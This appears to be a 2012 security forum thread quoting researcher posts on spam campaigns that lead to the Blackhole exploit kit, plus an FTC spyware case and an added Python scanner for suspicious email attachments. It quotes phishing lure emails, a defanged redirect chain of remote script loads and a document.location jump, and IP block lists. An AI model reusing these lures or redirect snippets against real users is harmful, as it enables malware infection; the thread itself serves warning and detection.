Fake Intuit email/Spam...
* http://blog.dynamoo.com/2012/09/intu...eloffceru.html
17 Sept 2012 22:41 - "This fake Intuit.com spam attempts to load malware from kerneloffce .ru:
Date: Mon, 17 Sep 2012 08:54:50 -0600
From: "Mason Jordan" [LillieRoell@digitalnubia.com]
Subject: Your Intuit.com software order.
Attachments: Intuit_Order_A49436.htm
Dear customer: Thank you for ordering from Intuit Market. We are processing and will message you when your order ships. If you ordered multiple items, we may sned them in more than one delivery (at no extra cost to you) to ensure quicker delivery. If you have questions about your order please call 1-900-130-1601 ($4.79/min).
ORDER INFORMATION
Please download your complete order id #1197744 from the attachment.(Open with Internet Explorer)
2012 Intuit, Inc. All rights reserved. Intuit, the Intuit Logo, Quickbooks, Quicken and TurboTax, among others, are registered trademarks of Intuit Inc.
The malicious payload is at kerneloffce .ru:8080/forum/links/column.php which was hosted on 46.51.218.71 (Amazon, Ireland) until it got nuked..."
> http://google.com/safebrowsing/diagn...erneloffce.ru/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 1 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 4 domain(s)..."

Malicious UPS/FedEx emails re: iPhone 5 orders

FYI...

Malicious UPS/FedEx emails re: iPhone 5 orders ...
- http://community.websense.com/blogs/...-iphone-5.aspx
18 Sep 2012 - "The first batch of iPhone 5s will be delivered on Friday of this week... From reading discussion forums online... all orders from Apple's online store will ship with UPS... when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.
> http://community.websense.com/cfs-fi...ion_5F00_1.png
... the email contained an attached HTML page that, when loaded, displayed the page below:
> http://community.websense.com/cfs-fi...00_browser.png
... the risk is great that recipients will have their guards down and will run the attached file... There's a hidden, obfuscated script on the page... it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC... the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails."
___

LinkedIn SPAM - Blackhole Exploit Kit v2.0...

FYI...

LinkedIn SPAM / 69.194.201.21
- http://blog.dynamoo.com/2012/09/link...919420121.html
22 Sep 2012 - "This fake LinkedIn spam leads to malware on 69.194.201.21:
Date: Sat, 22 Sep 2012 15:16:47 -0500
From: "Reminder" [CC8504C0E@updownstudio.com]
Subject: LinkedIn: New messages awaiting your response
LinkedIn
REMINDERS
Invitation reminders:
From Emilio Byrd (Insurance Manager at Wolseley)
PENDING MESSAGES
There are a total of 88 message(-s) awaiting your response. Go to InBox now.
This message was sent to [redacted]. This is an occasional email to help you get the most out of LinkedIn.
Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission.
2012, LinkedIn Corporation.
The malicious payload is at [donotclick]69.194.201.21 /links/deep_recover-result.php (Solar VPS, US) which appears to be a Blackhole 2 exploit kit. Blocking this IP address would be prudent."
___

BBB malicious SPAM flood

FYI...

BBB malicious SPAM flood
- http://community.websense.com/blogs/...pam-flood.aspx
24 Sep 2012 - "... another barrage of malicious BBB (Better Business Bureau) complaint notifications... Websense.. has detected and intercepted a marked increase in BBB malicious email this month... In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."
> http://community.websense.com/cfs-fi...D00_Image1.png
... a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs"...
> http://community.websense.com/cfs-fi...2D00_550x0.png
... As with other similar malicious campaigns with themes relating to ADP, Twitter, and LinkedIn, the techniques, tools and redirection path that are used are pretty much the same. Tools like the Cutwail spambot and Blackhole exploit kit seem to be the main weapons used by cybercriminals in malicious spam nowadays. Redirection paths:
1) hxxp ://vargasvilcolombia .com/PykKDZe/index.html
2)<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://pst.org .br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp ://www.adahali .com/NQ9Ba2ap/js.js"></script>
</html>
3) document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';
As is very common these days, the payload for this particular campaign is the recently updated BlackHole Exploit Kit v 2.0..."
___

- http://google.com/safebrowsing/diagnostic?site=AS:32475
"... over the past 90 days, 2949 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-24, and the last time suspicious content was found was on 2012-09-24... we found 149 site(s)... that appeared to function as intermediaries for the infection of 375 other site(s)... We found 141 site(s)... that infected 838 other site(s)..."

Last edited by AplusWebMaster; 2012-09-25 at 05:50.

The machine has no brain.
......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.

Twitter DMs from "friends" lead to backdoor Trojan...

FYI...

Twitter DMs from "friends" lead to backdoor Trojan
- http://nakedsecurity.sophos.com/2012...video-malware/
Sep 24, 2012 - "Have you received a Twitter message from an online friend, suggesting you have been captured in a Facebook video?... The aim of the messages? To trick the unwary into clicking on a link... and ultimately infect computers. Here is one example:
> https://sophosnews.files.wordpress.c...cked.jpg?w=640
... here's another. Note that there are many different combinations of wording that can be used.
> https://sophosnews.files.wordpress.c...ed-2.jpg?w=640
Users who click on the link are greeted with what appears to be a video player and a warning message that "An update to Youtube player is needed". The webpage continues to claim that it will install an update to Flash Player 10.1 onto your computer.
> https://sophosnews.files.wordpress.c...ware.jpg?w=640
... In this example, the program you are being invited to download is called FlashPlayerV10.1.57.108.exe, and is detected by Sophos anti-virus products as Troj/Mdrop-EML, a backdoor Trojan that can also copy itself to accessible drives and network shares. Quite how users' Twitter accounts became compromised to send the malicious DMs in the first place isn't currently clear, but the attack underlines the importance of -not- automatically clicking on a link just because it appeared to be sent to you by a trusted friend. If you do find that it was your Twitter account sending out the messages, the sensible course of action is to assume the worst, change your password (make sure it is something unique, hard-to-guess and hard-to-crack) and revoke permissions of any suspicious applications that have access to your account."


Multiple malware IP's to be blocked ...

FYI...

Evil network: 108.178.59.0/26
- http://blog.dynamoo.com/2012/09/evil...817859026.html
25 Sep 2012 - "There's quite a bit of malware coming from a range of Singlehop IPs over the past few days. The range is 108.178.59.0/26 (108.178.59.0 - 108.178.59.63)
So far, I've seen blackhole samples from 108.178.59.20, 108.178.59.11 and 108.178.59.26 which is enough to convince me that the whole /26 is bad and should be blocked.
Singlehop have reallocated the IP range to a customer:
network: IP-Network: 108.178.59.0/26
network: State: Italy
network: Country-Code: IT ...
It's quite possible that Mr Coco doesn't know that the IP range is being abused in this way, but blocking access to it would be prudent..."

BBB SPAM / one.1000houses .biz
- http://blog.dynamoo.com/2012/09/bbb-...housesbiz.html
25 Sep 2012 - "This fake BBB spam leads to malware at one.1000houses .biz:
Date: Tue, 25 Sep 2012 11:42:18 +0200
From: "Better.Business Bureau" [8050910@zread.com]
Subject: Activity Report
Dear business owner, we have received a complaint about your company possible involvement in check cashing and Money Order Scam.
You are asked to provide response to this complaint within 7 days.
Failure to provide the necessary information will result in downgrading your Better Business Bureau rating and possible cancellation of your BBB accreditation status.
Complaint ID#125368
Council of Better Business Bureaus
3033 Wilson Blvd, Suite 600
Arlington, VA 22201
Phone: 1 (703) 276.0100
Fax: 1 (703) 525.8277
The malicious payload is at [donotclick]one.1000houses .biz/links/deep_recover-result.php hosted on 199.195.116.185 (A2 Hosting, US). The domain 1000houses .biz appears to be a legitimate domain where the GoDaddy account has been hacked to serve malware on subdomains. There seems to be a long-standing issue with GoDaddy domains being used in this way. Blocking 199.195.116.185 would probably be prudent..."

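The BBB and Singlehop posts above describe the same redirection chain: an HTML attachment that pulls remote scripts, then a document.location jump to a Blackhole landing path on a blocked IP. The triage script below is an added example (not from dynamoo, Websense or this thread's author) that pulls every remote script/iframe source and location redirect out of such an attachment and flags those that hit the ranges and landing paths quoted in the posts. The sample attachment is constructed; compromised-site .example is a placeholder host.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicators quoted in the write-ups above (dynamoo / Websense)
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "108.178.59.0/26", "69.194.201.21/32", "199.195.116.185/32", "46.51.218.71/32")]
KIT_PATHS = ("/links/deep_recover-result.php", "/forum/links/column.php")

_SRC_RE = re.compile(r'<(?:script|iframe)[^>]*\ssrc=["\']([^"\']+)["\']', re.I)
_LOC_RE = re.compile(
    r'(?:document|window)\.location(?:\.href)?\s*=\s*["\']([^"\']+)["\']', re.I)


def refang(url):
    """Undo the 'hxxp ://host .tld /path' defanging used in the posts."""
    return (url.replace("hxxp", "http").replace(" ://", "://")
               .replace(" .", ".").replace(" /", "/"))


def extract_targets(html):
    """Remote loads and location redirects found in an HTML attachment."""
    return [refang(u) for u in _SRC_RE.findall(html) + _LOC_RE.findall(html)]


def classify(url):
    """Reasons to treat a target as part of the campaign (empty = nothing seen)."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    reasons = []
    if host:  # an email attachment has no business fetching remote content
        reasons.append("remote load from email attachment")
    try:
        ip = ipaddress.ip_address(host)
        for net in BLOCKED_NETWORKS:
            if ip in net:
                reasons.append(f"host in blocked range {net}")
    except ValueError:  # hostname, not an IP literal
        pass
    if parsed.path in KIT_PATHS:
        reasons.append("known Blackhole landing path")
    return reasons


def scan_attachment(html):
    """Map each suspicious target URL to the reasons it was flagged."""
    return {u: r for u in extract_targets(html) if (r := classify(u))}


# Constructed sample, shaped like redirection step 2/3 in the BBB post
SAMPLE = """<html><h1>WAIT PLEASE</h1><h3>Loading...</h3>
<script type="text/javascript" src="hxxp ://compromised-site .example/Wi4aFSLZ/js.js"></script>
<script>document.location='hxxp ://108.178.59.11 /links/deep_recover-result.php';</script>
</html>"""

if __name__ == "__main__":
    for url, why in scan_attachment(SAMPLE).items():
        print(url, "->", "; ".join(why))
```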

FTC halts computer spying

Rent-to-own laptops were spying on users
- http://h-online.com/-1717567
26 Sep 2012 - "The US Federal Trade Commission (FTC) has settled a case with several computer rent-to-own companies and a software maker over their use of a program which spied on as many as 420,000 users of the computers. The terms of the settlement* will ban the companies from using monitoring software, deceiving customers into giving up information or using geo-location to track users. "The FTC orders today will put an end to their cyber spying" said Jon Leobowitz, FTC Chairman. The software for rental companies from DesignerWare included a "Detective Mode", a spyware application that, according to the FTC's complaint, could activate the webcam of a laptop and take pictures and log keystrokes of user activity. The software also regularly presented a fake registration screen designed to trick users into entering personal information. The data from this application was then transmitted to DesignerWare where it was then passed on to the rent-to-own companies... The FTC is limited in its actions, telling Wired**, "We don't have criminal authority. We only have civil authority" and, as this was a first violation of the FTC act, it cannot impose fines on the companies. Instead, the companies will be monitored by the FTC for compliance with the ban on using the software, or, in the case of DesignerWare, licensing it, for the next 20 years..."
** http://www.wired.com/threatlevel/201...yware-scandal/
